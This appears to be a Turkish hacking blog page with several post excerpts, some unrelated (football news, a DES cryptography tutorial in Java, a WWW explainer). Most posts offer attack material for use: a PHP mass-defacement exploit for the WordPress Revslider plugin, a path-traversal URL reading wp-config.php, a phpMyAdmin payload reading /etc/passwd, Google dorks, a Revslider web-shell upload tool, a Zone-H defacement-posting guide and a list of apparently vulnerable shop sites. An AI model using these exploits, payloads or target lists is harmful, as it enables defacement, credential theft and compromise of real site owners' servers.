-
30 Mart 2015 Pazartesi
no image

Selamün Aleyküm Cyberizm Ailesi. Birkaç günden beri zone-h.org'da Index PHP, YunusIncredibl,Islamic State,Holako,Lunatico gibi hackerların kastığı açığı paylaşıcam. Cyberizm için elinizden geleni arkanıza koymayın.

Açığın Kaynaklandığı Yerler =>

Kod:
HEDEFSITE/wp-admin/admin-ajax.php


Kod:
HEDEFSITE/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

Hacklediğiniz Yeri Görmek için =>
Kod:
/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css

İşte O Exploit =>

İçerik açılmıştır. Yorum yazdığınız için teşekkürler.valid
Kod:
<?php
        echo "\n+-------------------------------------------+\n";
        echo "|  Cyberizm Digital Security Army             |\n";
        echo "| http://www.cyberizm.org/ |\n";
        echo "+-------------------------------------------+\n";

$gv=@file_get_contents($argv[1]);
    $exv=explode("\r\n",$gv);
    echo "\n\t Total site loaded : ".count($exv)."\n\n";
    foreach($exv as $url){
      echo "\n[+]Scaning : $url \n";
      dr($url);
    }
  function dr($site){
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, "".$site."/wp-admin/admin-ajax.php");
    curl_setopt($ch, CURLOPT_USERAGENT, $agent);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, array("action" => "revslider_ajax_action", "client_action" => "update_captions_css", "data" => "<body style='color: transparent;background-color: black'><center><h1><b style='color: white'>Hacked by KingSkrupellos Cyberizm Digital Security Team<p style='color: transparent'>"));
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie_file_path);
    curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie_file_path);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
    $result = curl_exec($ch);
            if (eregi('true', $result)) 
            
                $path="$site/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css";
$gett=@file_get_contents($path);
if(preg_match('/Hacked by KingSkrupellos Cyberizm Digital Security Army/',$gett)){
  echo "\n[+]Exploit Done \n[+]shell : $path \n\n ";
                $fo = fopen("finish.txt","a+");
            $r = fwrite($fo,"".$path."/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css\r\n");
            fclose($fo);
    } else {
        echo "| ".$site . " : Not Revslider \n\n";
    }
    curl_close($ch);
    
    }
    
       echo "\n[-]Exploit Fail \n\n";
}


    
        }
?>
DEVAMINI OKU..
TFF'den çifte standart!



Hollanda maçı sonrası Türkiye Futbol Federasyonu tepki çeken bir tercih yaptı.



A Milli Takımımızın Amsterdam Arena'da 1-1 berabare kaldığı Hollanda maçı sonrası bazı futbolcular A Milli Takım Teknik Direktörü Fatih Terim tarafından İstanbul'a gönderilmişti. Bu futbolculardan Galatasaraylı Burak Yılmaz, Hamit Altıntop ve Hakan Balta ile Fenerbahçeli Gökhan Gönül ve Mehmet Topal, Business bölümünde İstanbul'a dönerken, Beşiktaşlı oyuncular Ersan ve Gökhan Töre, Bursasporlu Serdar Aziz ile Başakşehirsporlu Volkan ekonomi sınıfında uçtu.

Tepkiye neden oldu!

Türkiye Futbol Federasyonu yetkililerinin neden böyle bir ayrım yaptığı veya neye göre böyle bir tercih yaptığı bilinmiyor. Zaman zaman uçak ayarlayıp siyasiler başta olmak üzere birçok davetliyi yurt dışına götüren TFF'nin böyle kritik bir maç sonrası bu yaklaşımı tepki topladı. Uçaktaki bazı futbolseverler de "Neden Galatasaraylı ve Fenerbahçeli futbolcular Business bölümünde uçuyor" tepkisini verdi.

DEVAMINI OKU..
no image

SA.

Bölüme adaylığımı koydum bundan dolayı çalışmalara başladım.:)Bu Konu altından bypass yöntemleri verelim . Her sunucunun kendine özel konfigürasyonu vardır,bu yüzdende her exploit her sunucuda çalışmayabilir. Buradada devreye Cyber-Warrior girecek ve bu konudan istediğiniz sunucnun geçiş yöntemini paylaşabilecek/alabileceksiniz.

Lütfen konuyu dağıtacak postlar atılmasın,herkes bildiğini eklesinki faydalı bir paylaşım olsun.İlk paylaşımıda ben yapayım.Genellikle bütün sunucularda phpmyadmin kurulu olur,bende bir exploit vereceğim ve konuyu güncel tutacagım , fırsat buldukça eklemeler yapacağım..


Quote: Popüler Mysql Yönetim yazılımı olan PhpMyAdmin’deki bir açıkla sunucudaki dosyaları görüntüleyebilirsiniz. Açık için bir exploit bulunsa da bunu kolaylıkla Clicker gibi HTTP Post yapan yazılımlarla gerçekleştirebilirsiniz.

HTTP emulatoru kullanarak saldırı yapmak için:

1- Çalışan bir proxy yükleyin.
2- Post seçeneğini kullanın.
3- Data kısmına aşağıdakileri girin:

usesubform[1]=1&usesubform[2]=1⊂form[1][redirect]=../../../../../etc/pas
swd⊂form[1][cXIb8O3]=1

(../…./etc/passwd dosyasını okunmasını istediğiniz dosya ile değiştirebilirsiniz)

4- Referer kısmını site ile aynı yapın.
5- Url kısmına

http://www.siteadresi.com/phpmyadmin

gibi bir adres girin.

Post işlemini gerçekleştirdikten sonra açılan sayfada Unable to Access yazarsa dosyanın sunucuda bulunmadığı anlamına gelir, farklı dosya adları deneyebilirsiniz…
DEVAMINI OKU..
Zone-H Mass



Burada ben deneme amaçlı olarak deneyelim adlı bir defacer’dan www.olaycokbasitoldu.com sitesini eklemeyi gösterdim. Siz dilerseniz burada enter tuş kombinasyonu ile alt satıra geçerek birden çok site eklemesi de yapabilirsiniz. Ben örnek teşkil etsin diye yalnızca bir site ekledim.



Daha sonra ise kaydet tuşuna basıyoruz. Ve Zone-H sistemine ilgili siteyi girdiğimiz bilgilerle kayıt etmesini bekliyoruz.İşlem bittiğinde bize aynı ekranda en altta bir uyarı gelecek resimde gördüğünüz üzere.


Ve şimdi giderek Zone-H üzerinde kayıt ettiğimiz defaceyi görebiliriz.




DEVAMINI OKU..
no image

Kriptografik Bir Program Yazmanın Önkoşulları
Kriptografi ve güvenlik, yazılım dünyasında gün geçtikçe ortaya çıkan yeni teknolojiler sayesinde gittikçe derinleşen konulardır. Modern kriptolama ve güvenlik teknolojileri gelişmiş algoritmaları sayesinde yazılım güvenliğini ön planda tutma amacını güderken, şifreleme işlemi sırasında kaybedilecek zamanı minimum düzeye indirerek etkinlik sağlar. Bu yüzden bir güvenlik programı veya kimlik denetimi yapan kriptografik bir uygulamayı yazmaya başlamadan önce modern kriptolama teknolojileri ve kriptolama algoritmaları araştırılarak kriptolama tekniklerinin sınıflandırılması, varsa aralarındaki ilişkinin kurulması, farklılıklarının veya benzerliklerinin ortaya çıkarılması önkoşullar olarak söylenebilir. Eğer ki bu programlar Java programlama dili kullanılarak geliştirilecekse tavsiyem Java’nın crypto ve security kütüphanelerinin incelenmesidir. Özellikle kriptolama algoritmaları içerisindeki elemanların nitelik ve değerlerine ulaşmak amacıyla crypto paketindeki gerekli bölümler (Cipher, SecretKey, KeyGenerator, PBEKeySpec, SecretKeyFactory, PBEParameterSpec, SecretKeySpec, NoSuchPaddingException, BadPaddingException, IllegalBlockSizeException) ile security paketindeki gerekli bölümlerin (KeySpec, AlgorithmParameterSpec, NoSuchAlgorithmException, InvalidAlgorithmParameterException, InvalidKeyException, InvalidKeySpecException) incelenmesini öneririm.

Enine Boyuna Modern Kriptolama Teknolojileri ve Algoritmaları

Modern kriptografi iki ana dala ayrılır. Bunlar, gizli anahtarlı şifreleme diğer bir deyişle simetrik-anahtar kriptografisi (symmetric-key cryptography) ve asimetrik-anahtar kriptografisi (asymmetric-key cryptography) olarak da bilinen açık anahtarlı şifrelemedir. Aşağıda kısaca tanımlamalarını yaptıktan sonra algoritmalarını tek tek ele alacağımız bu kriptosistemler hakkında detaylı bilgiye yine "Şifrelerin Büyülü Dünyası" makalemizden ulaşabilirsiniz. Gizli anahtarlı şifreleme, hem şifreleme hem de şifre çözme işlemleri için aynı anahtarı kullanan bir kripto sistemdir. Senkronize halde çalışan birimler arasında kurulan kripto sistemlerde iletişimin daha kuvvetli olması gerektiğinden bu tip alanlarda simetrik-anahtar kriptografisini kullanmak su ***ürmez bir gerçektir. Gizli anahtarlı şifreleme aşağıda derinlemesine ele alacağım DES (Data Encryption Standard), Blowfish, DESede ve Pass Phrase gibi yaygın ve güçlü şifreleme algoritmalarına sahiptir. Açık anahtarlı şifrelemede ise haberleşen tarafların her birinde birer çift anahtar bulunur ve bu anahtar çiftlerini oluşturan anahtarlardan biri gizli diğeri de açık anahtardır. Açık anahtarla, bilgiler sadece gizli anahtarın sahibi tarafından çözülebilecek şekilde şifrelenebilir ya da gizli anahtar sahibinin sayısal imzasının ve kimliğinin doğruluğu kontrol edilebilir. Açık anahtarlı şifreleme aşağıda da değineceğim DH (Diffie-Hellman), RSA ve DSA (Digital Signature Algorithm) gibi şifreleme algoritmalarına sahiptir. Sizler de açık ve gizli anahtarlı şifreleme algoritmaları üzerine bir araştırma yapacak olursanız şayet, algoritmaların şifreleyici mekanizmalarını belirli bir anahtar yaratarak bu anahtar yardımıyla kurduğunu gözlemleyeceksiniz. Ayrıca yaratılan anahtarların uzunluklarının ve her kullanım için özel olup olmamalarının, algoritmaların değişkenlik gösteren nitelikleri olduğunu göreceksiniz. Aynı algoritmanın birbirinden farklı uzunlukta veya nitelikte olan anahtarlarından oluşmuş şifreleyicilerle kriptoladığı verilerin farklılık gösterdiğine şahit olacaksınız.

Şimdi yukarıda örneklerini verdiğim algoritmaları daha yakından ele alalım:




DES (Data Encryption Standard):

DES, 64-bit blok büyüklüğüne ve anahtar uzunluğuna sahip fakat sahip olduğu bu 64-bit anahtar uzunluğunun yalnız 56-bit’inin işlevsellik taşıdığı bir öbek şifreleyicidir. Her kullanımında o kullanıma özel yeni bir anahtar yaratması DES’in güçlü, günümüz teknolojisi için algoritmasının yavaş ve 56-bit’lik efektif anahtar uzunluğunun yetersiz kalması DES’in zayıf yönleridir.

DES’i araştırırken bir başka algoritma daha dikkatimi çekti. DES altyapılı olan AES’in (Advanced Encryption Standard), şu an dünyada en yaygın olarak kullanılan simetrik şifreleme algoritması ve Amerikan yönetimi tarafından şifreleme standardı olarak kabul edilmiş bir öbek şifreleyici olduğunu öğrendim. AES’in DES’in aksine donanımda ve yazılımda hızlı olması, daha kolay uygulanabilir olması ve çok daha az hafızaya gerek duyması güçlü yönleri olarak söylenebilir. AES, 128-bit (16 byte) blok büyüklüğüne ve 128, 192 ve 256-bit gibi değişken anahtar uzunluğuna sahip bir algoritmadır.




Blowfish:
Blowfish, DES’in eksik kalmaya başlamasından sonra onun yerini alması amacıyla tasarlanmış bir öbek şifreleyici olup DES gibi 64-bit blok büyüklüğüne sahiptir ve anahtarlarının uzunluğu 32-bit’ten 448 bit’e (56 bayt) kadar uzanır. Blowfish’in en büyük özelliği herkes tarafından dilenildiği şekilde ve ücretsiz olarak kullanılabilir olmak olsa da tüm alt anahtarları oluşturması için 521 kez çalışması gerekiyor – bunun sonucunda yaklaşık 4 KB veri işlenmiş oluyor. Blowfish’in, 4 KB RAM’dan biraz fazla hafıza gereksinimi onun smartcard’lar (akıllı kartlar) gibi en küçük gömülü sistemlerde kullanımını engeller. Yinede yüksek şifreleme oranıyla (high encryption rate), kısa öbek büyüklüğüyle ve e-posta gibi rutin kullanıcı uygulamaları konusundaki etkinliğiyle başarılı bir algoritma olarak değerlendirilmektedir.

Pass Phrase:
Pass Phrase, ATM kartlarının PIN ve smartcard uygulamaları için kullanılan parolalardan farklı olarak kullanıcıdan uzak güvenlik sistemleri için uygulanan, parola mantığında bulunmayan karakterler arasında boşluk bırakmaya olanak tanıyan diğer bir deyişle kullanıcı tarafından kolayca akılda tutulabilecek karakter dizilerini anahtar yaratmada kullanan bir öbek şifreleyicidir. Dizi değişmediği sürece oluşturulacak her anahtar birbirinin aynısı olacaktır. Güvenlik açısından parolalara göre daha esnek ve güvenilir olması Pass Phrase’in güçlü tarafıdır.




DESede:
DESede de yakın akrabası DES gibi her kullanımında o kullanıma özel yeni bir anahtar yaratan fakat yine günümüz teknolojisi için algoritmasının yavaş kalmasıyla kullanılırlığını kaybetmeye başlamış bir öbek şifreleyicidir. 168-bit’lik anahtar uzunluğu onu DES’ten ayıran en önemli özelliği de olsa DESede sahip olduğu bu 168-bit’lik anahtar uzunluğunun yalnız 112-bit’ini efektif olarak kullanır.

DH (Diffie-Hellman):
Açık anahtarlı şifreleme algoritmalarından DH, iki katılımcının öncesinde herhangi bir bilgi alışverişi yapmadan güvenli olmayan bir kanal vasıtasıyla (güvenli bir şekilde) ortak bir 
şifrede karar kılmalarına yarayan bir protokoldür. Algoritmanın asıl amacı, iki kullanıcının bir anahtarı güvenli bir şekilde birbirlerine iletmeleri ve daha sonrasında da bu anahtar yardımı ile şifreli mesajları birbirlerine gönderebilmelerini sağlamaktır. Algoritma anahtar değişimi ile sınırlıdır olmasına rağmen yinede birçok ticari uygulama bu anahtar değişimini kullanmıştır.

RSA:
RSA ise, hem mesaj şifreleme hem de elektronik imza amacıyla kullanılan daha çok ticari uygulamalarda tercih edilen tam sayılar üzerinde en iyileştirme yapılarak (integer factorization) oluşturulan değerlerden anahtarların üretildiği bir şifreleme teknolojisidir.

DSA:
Son olarak DSA ise anahtar oluşumunda logaritmik fonksiyonları kullanan, internet üzerinden güvenli iletişimi sağlayan TLS (transport layer security) kriptografik protokolü için sağladığı PFS (perfect forward secrecy) desteğiyle tanınan bir algoritmadır. Diğer bir deyişle, PFS temel olarak anahtarlardan birinin gelecekte tehlikeye girmesi durumunda diğer anahtarları güvence altına alan bir özelliktir.

Sonuç olarak asimetrik şifreleme sistemlerinin anahtar oluşumunda karmaşık matematiksel metotlar kullanmaları, onları simetrik şifreleme sistemlerine göre çok daha yavaş olmalarının başlıca sebebidir. Kullanım alanlarının simetrik şifreleme sistemlerine göre daha sınırlı olması ve uygulamada daha yavaş çalışmaları etkin olarak kullanılmamaları sonucunu doğurur. Yapılarının daha çok sunucu – kullanıcı ilişkili sistemlere ve mesaj doğrulama sistemlerine uygun olması, anahtar üretimi ve şifreleme işlemlerinin uzun sürmesi zayıf kalan yönleridir.

Son olarak da DES kriptolama algoritmasını Java programlama dilini kullanarak yazmış olduğum bir program üzerinde göstermek istiyorum. Yazmış olduğum bu program DES algoritmasını kullanarak verilen karakter dizilerini şifrelemeye yada şifrelenmiş bir dizinin şifresini çözmeye yarıyor.




Kod:
import java.io.UnsupportedEncodingException;
import javax.crypto.Cipher;
import javax.crypto.IllegalBlockSizeException;
import javax.crypto.KeyGenerator;
import javax.crypto.SecretKey;

public class DesEncrypter {
Cipher eCipher;
Cipher dCipher;

DesEncrypter(SecretKey key) {
try {
eCipher = Cipher.getInstance("DES");
dCipher = Cipher.getInstance("DES");
eCipher.init(Cipher.ENCRYPT_MODE, key);
dCipher.init(Cipher.DECRYPT_MODE, key);

} catch (javax.crypto.NoSuchPaddingException e) {
} catch (java.security.NoSuchAlgorithmException e) {
} catch (java.security.InvalidKeyException e) {
}
}

public String encrypt(String str) {
try {
byte[] utf8 = str.getBytes("UTF8");

// Şifreleme
byte[] enc = eCipher.doFinal(utf8);

// Bytes dizisini BASE64 ile karakter dizisine çevir
return new sun.misc.BASE64Encoder().encode(enc);
} catch (javax.crypto.BadPaddingException e) {
} catch (IllegalBlockSizeException e) {
} catch (UnsupportedEncodingException e) {
} catch (java.io.IOException e) {
}
return null;
}

public String decrypt(String str) {
try {
byte[] dec = new sun.misc.BASE64Decoder().decodeBuffer(str);

// Şifreyi çözme
byte[] utf8 = dCipher.doFinal(dec);

return new String(utf8, "UTF8");
} catch (javax.crypto.BadPaddingException e) {
} catch (IllegalBlockSizeException e) {
} catch (UnsupportedEncodingException e) {
} catch (java.io.IOException e) {
}
return null;
}

public static **** main(String[] args) {
try {
// Geçici bir anahtar oluştur
SecretKey key = KeyGenerator.getInstance("DES").generateKey();

// Şifreleyecek objeyi yarat
DesEncrypter encrypter = new DesEncrypter(key);

// Şifrele
String encrypted = encrypter.encrypt("E-Bergi Mart sayısı");
System.out.println(encrypted);

// Şifreyi çöz
String decrypted = encrypter.decrypt(encrypted);
System.out.println(decrypted);
} catch (Exception e) {
}
}
}
DEVAMINI OKU..
Wordpress 0day Exploiter



Download:http://www.datafilehost.com/d/ec2679ce (unselect Use our download manager and get recommended downloads)

Dorks:

Quote: Yazdı:inurl:/wp-content/themes/appius/
inurl:/wp-content/themes/Consultant/
inurl:/wp-content/themes/appius1/
inurl:/wp-content/themes/archin/
inurl:/wp-content/themes/averin/
inurl:/wp-content/themes/dagda/
inurl:/wp-content/themes/echea/
inurl:/wp-content/themes/felici/
inurl:/wp-content/themes/GantiDengantema/
inurl:/wp-content/themes/kmp/
inurl:/wp-content/themes/kmp2/
inurl:/wp-content/themes/themanya/
inurl:/wp-content/themes/liberal/
inurl:/wp-content/themes/liberal-media-bias/
inurl:/wp-content/themes/linguini/
inurl:/wp-content/themes/livewire/
inurl:/wp-content/themes/majestics/
inurl:/wp-content/themes/mathis/
inurl:/wp-content/themes/mazine/
inurl:/wp-content/themes/Orchestra/
inurl:/wp-content/themes/shopsum/
inurl:/wp-content/themes/shotzz/
inurl:/wp-content/themes/test/
inurl:/wp-content/themes/Viteeo/
inurl:/wp-content/themes/vithy/
inurl:/wp-content/themes/yvora/
inurl:/wp-content/themes/sodales/

Usage: 

1- Simply paste the site URL,theme name, an your email in the textbox

2- Click on Confirm > Exploit

3- If your target is vulnerable, the "Register" button will be enabled

4- Click on Register and the webbrowser will bring you to the registration page

5- Enter your username and email

6- Check your email inbox for the confirmation and the password for your account.

7- Login to the site and there you go Smile 
DEVAMINI OKU..
Revslider upload shell exploit



Hi Guys i hope All fine incha'Allah :)

Today i will show u auto exploiter Revslider upload shell not read config 

how script work 

first u must upload this file : adres  (revslider.zip)
than collect list and script and file revslider.zip in the same folder
after run the script in cmd .


the file revslider have up.php this is post upload work on up?coders=leet when we run our script will upload revslider.zip to site not shell and wll extrat manually 

usage : php rev.php list.txt
rev.php is name of script exploitation u can named it whaever
lis.txt : list of sites vul

after upload Done u will show u path of shell go to it u will find message " Mr.MaGnoM codersleet ..." just u will add ?coder=leet to file will be up.php?coders=leet is just hide upload :)



rev.php script for exploit : adres
Dork : inurl:/wp-content/plugins/revslider/
DEVAMINI OKU..
entest Hedef Site Bilgi Toplama Aracı v1.0



Bu program Web Pentest işlemlerinde bilgi toplama aşamasında kullanılabilecek pratik bir pentest aracıdır. Program beta sürüm olup sorunlar çıkabilir. Çıkarsa bildirmeniz rica olur. Program hedef hakkında bir çok sonuç çıkabilir ve sonuçları kolayca kaydetme özelliğine sahiptir. Birden fazla kaynak siteleri kullanmaktadır. Tüm haklarım saklıdır kötüye kullanımda sorumlu kullanıcıya aittir. İndirme linki ve resimler aşağıdadır teşekkürler.

İndirme Linki:
adress




DEVAMINI OKU..
no image

Merhaba arkadaşlar , bugün sürekli kullandığımız internetin temeli olan www 'nin açılımını inceleyeceğiz.

World Wide Web (kısaca WWW veya web), internet üzerinde yayınlanan birbirleriyle bağlantılı hiper-metin dokümanlarından oluşan bir bilgi sistemidir. Bu dokümanların her birine web sayfası adı verilir ve web sayfalarına internet kullanıcısının bilgisayarında çalışan web tarayıcısı adı verilen bilgisayar programları aracılığıyla erişilir. Web sayfalarında metin, imaj, video ve diğer multimedya öğeleri bulunabilir ve diğer bağlantı ya da link adı verilen hiper-bağlantılar ile başka web sayfalarına geçiş yapılabilir.

İnternet ve web terimleri aynı olguyu tanımlamaz. Zira web sadece internet üzerinde çalışan bir servistir. Web kavramı, CERN'de bir bilgisayar programcısı olan Tim Berners-Lee'nin HTML adlı metin işaretleme dilini geliştirmesiyle oluşmuştur. Bugün de kendisinin başkanı olduğu W3C (World Wide Web Consortium) tarafından standartları belirlenmektedir.

Yapısı[değiştir | kaynağı değiştir]
Web’in temeli İnternettir. Web İnternet üzerinde kurulmuştur ve İnternetin sunduğu mekanizmalardan çoğunun kullanılmasını sağlar. İnternetin fiziksel görünüşleri –bilgisayarlar, ağlar ve servisler- dünya üzerindeki diğer binlerce bilgisayara bağlanmamıza izin verir. Web, İnternetin en tepesindeki soyutlanmış genel servisler kümesidir. World-Wide Web (W3), insanların fikir ve projelerinin paylaşılmasını sağlayan bir bilgi ve kültür havuzudur. İstemci-sunucu uygulamaları ile yapılan birçok organizasyon üzerinde Web tarayıcıları İstemci olarak çalışabilirler. Web yürütümü standart İstemci-sunucu modelini izler. Aşağıdaki şekilde gösterildiği gibi "Web tarayıcısı" adı verilen programı çalıştıran bir istemci bilgisayar ile Web sunucu yazılımı çalıştıran bir sunucu bilgisayar arasındaki etkileşime "İstemci-sunucu" etkileşimi adı verilir. İstemci bilgisayar sunucudan HTTP'yi (Hypertext Transfer Protocol) ve Internet mesaj standartı olan TCP/IP'yi kullanarak bir doküman ister ve sunucu istemcinin göstereceği dokümanı geri döndürür.

"World-Wide Web" ibaresi HTTP ile anlaşan sunucuların kolektif ağını ifade etmek için kullanılır. HTTP var olan bilgilerin kullandıkları protokolün global yapısıdır.

Web tarayıcılarının ve sunucularının kendi aralarında iletişim için kullandıkları protokole HTTP (Hypertext Transafer Protocol) adı verilir. Bunun için Web Sunuculara genellikle HTTP Sunucu veya HTTP Deaemons (HTTPD) denir.


Sunucular ve istemciler arasındaki iş paylaşımı[değiştir | kaynağı değiştir]
Tarayıcı istemcinin isteğini sunucuya iletir. İsim sunucularının, domain isimlerinin, adres isimlerinin ve fiziksel konumların tutulduğu diğer araçlarla iletir. Tarayıcı CIO.com - Tech News, Analysis, Blogs, Video için istekleri karşılayan makineye doğru iletir.

Bilgiler Web Sunucuya gelince, sunucu onları başka bir işleme gönderir (arama işlemi veya bir uygulama) ve bir süre bekler. Cevabı alırsa nesneyi sizin tarayıcınıza gönderir. Tarayıcınız birçok değisik parçayı birlikte tutar. Bir Web sayfası ağ üzerindeki birçok nesnenin referansını tutabilir. Hepsini birlikte çeker ve son ürünü size sunar.
DEVAMINI OKU..
no image

http://www.rcdeal.com/modules/stores/store.php?id=4
http://www.oaxis.com/shop/product_detail.php?id=11
http://teamgear.us/store.php?id=1
http://www.ttlures.com.au/product.php?id=191
http://www.sabghijewelers.com/online-store.php?id=5
http://www.mbtagifts.com/shop.php?c=4
http://www.juliefowlis.com/store/product.php?id=327&categoryid=19
http://www.karnaticlabrecords.com/cart.php?id=88
http://www.pinoy-market.com/store.php?id=136
http://hollandbros.net/store.php?id=31
http://www.oceancoffee.com/product.php?id=63
http://www.antiquesincanada.com/shop.php?myID=496
http://www.ngxtech.com/shop/index.php?cPath=10&task=cat
DEVAMINI OKU..
no image

inurl:/wp-content/themes/appius/ 
inurl:/wp-content/themes/Consultant/ 
inurl:/wp-content/themes/appius1/ 
inurl:/wp-content/themes/archin/ 
inurl:/wp-content/themes/averin/ 
inurl:/wp-content/themes/dagda/ 
inurl:/wp-content/themes/echea/ 
inurl:/wp-content/themes/felici/ 
inurl:/wp-content/themes/GantiDengantema/ 
inurl:/wp-content/themes/kmp/ 
inurl:/wp-content/themes/kmp2/ 
inurl:/wp-content/themes/themanya/ 
inurl:/wp-content/themes/liberal/ 
inurl:/wp-content/themes/liberal-media-bias/ 
inurl:/wp-content/themes/linguini/ 
inurl:/wp-content/themes/livewire/ 
inurl:/wp-content/themes/majestics/ 
inurl:/wp-content/themes/mathis/ 
inurl:/wp-content/themes/mazine/ 
inurl:/wp-content/themes/Orchestra/ 
inurl:/wp-content/themes/shopsum/ 
inurl:/wp-content/themes/shotzz/ 
inurl:/wp-content/themes/test/ 
inurl:/wp-content/themes/Viteeo/ 
inurl:/wp-content/themes/vithy/ 
inurl:/wp-content/themes/yvora/ 
inurl:/wp-content/themes/sodales/
DEVAMINI OKU..